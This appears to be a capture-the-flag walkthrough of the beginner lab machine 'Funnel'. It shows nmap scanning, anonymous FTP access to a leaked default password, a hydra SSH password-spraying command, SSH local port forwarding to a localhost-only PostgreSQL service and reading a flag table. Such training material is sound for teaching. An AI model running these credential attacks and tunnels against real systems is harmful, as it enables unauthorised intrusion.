Introduction
Last time, we took a peak at a poorly misconfigured Windows machine. Today, we will switch things up a bit and take a look at the machine Funnel. This is a beginner level machine that primarily explores port forwarding and tunneling in order to gain escalated privileges within a network. Let’s get to pwning!
Task 1:
Simple nmap -sC -sV -sT
scan output:
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 ftp ftp 4096 Nov 28 2022 mail_backup
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:{KALI MACHINE}
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
How many TCP ports are open?
Answer: 2
Task 2:
Typically, FTP does not require password authentication for anonymous users accessing public resources.
ftp {MACHINE IP HERE}
Connected to {MACHINE IP HERE}
220 (vsFTPd 3.0.3)
Name (MACHINE IP HERE:kali): anonymous
331 Please specify the password.
Password: <blank password>
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||64514|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Nov 28 2022 mail_backup
226 Directory send OK.
ftp>
What is the name of the directory that is available on the FTP server?
Answer: mail_backup
Task 3:
After upon downloading the goodies found on the server, we uncover some vital information.
ftp> cd mail_backup
250 Directory successfully changed.
ftp> dir
229 Entering Extended Passive Mode (|||59181|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 58899 Nov 28 2022 password_policy.pdf
-rw-r--r-- 1 ftp ftp 713 Nov 28 2022 welcome_28112022
226 Directory send OK.
ftp> get password_policy.pdf
local: password_policy.pdf remote: password_policy.pdf
229 Entering Extended Passive Mode (|||23373|)
150 Opening BINARY mode data connection for password_policy.pdf (58899 bytes).
100% |*****************| 58899 324.14 KiB/s 00:00 ETA
226 Transfer complete.
58899 bytes received in 00:00 (169.87 KiB/s)
ftp> get welcome_28112022
local: welcome_28112022 remote: welcome_28112022
229 Entering Extended Passive Mode (|||61040|)
150 Opening BINARY mode data connection for welcome_28112022 (713 bytes).
100% |*****************| 713 12.86 KiB/s 00:00 ETA
226 Transfer complete.
713 bytes received in 00:00 (3.84 KiB/s)
ftp>
What is the default account password that every new member on the “Funnel” team should change as soon as possible?
Answer: funnel123#!#
Task 4:
Password cracking time! Create a new file called usernames.txt and enter the names that we have found in the welcoming document.
optimus
albert
andreas
christine
maria
Next, spin up hydra.
$ hydra -L usernames.txt -p 'funnel123#!#' {MACHINE IP HERE} ssh
.. Snipping verbose hacker text ..
[22][ssh] host: {MACHINE IP HERE} login: christine password: funnel123#!#
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-08-21 00:47:28
Which user has not changed their default password yet?
Answer: christine
Task 5:
ss - another utility to investigate sockets
Once successfully logged in as christine, run ss -tln
to list out all listening ports on the server. Run ss
again without the -n
to list out each service’s respective names.
Local Address:Port
127.0.0.53%lo:53
0.0.0.0:22
127.0.0.1:5432
127.0.0.1:36893
*:21
[::]:22
Which service is running on TCP port 5432 and listens only on localhost?
Answer: postgresql
Task 6:
Local port forwarding is quite easy to understand. What we’re doing here is simply connecting to the server at a specified port through the SSH server. The SSH server then redirects the connection straight to the PostgreSQL backend.
ssh -L 1234:localhost:5432 christine@{MACHINE IP HERE}
Since you can’t access the previously mentioned service from the local machine, you will have to create a tunnel and connect to it from your machine. What is the correct type of tunneling to use? remote port forwarding or local port forwarding?
Answer: Local Port Forwarding
Task 7:
Once logged in as christine
on the PostgreSQL backend, running \l
will output a list of available databases including one called secrets
.
What is the name of the database that holds the flag?
Answer: secrets
Task 8:
Quick explanation:
Local port fowarding allows you to access a remote service locally as if it were directly accessible from your own computer. Port forwarding creates something known as tunneling, which simply put, is the encapsulation of data traveling from one point to another.
-L Command:
ssh -L 8080:localhost:3306 user@remote-server
Dynamic port forwarding is a bit more interesting. What happens here is you must initiate a SOCKS server on your local machine in order to forward ports and all internet traffic to any remote server. There’s also the added factor of increased anonymity.
-D Command:
ssh -D 8080 user@remote-server
Would you use a dynamic tunnel instead of local port forwarding? Yes or No.
Answer: Yes
Task 9:
Connect to the secrets
database using \c
. You then will want to run \dt
to take a gander at the available tables. Lo and behold, a flag
table is sitting right in plain view! Run the conventional SQL SELECT command to grab the flag.
Just like that, machine pwned.
Submit root flag
Answer: cf2*****************************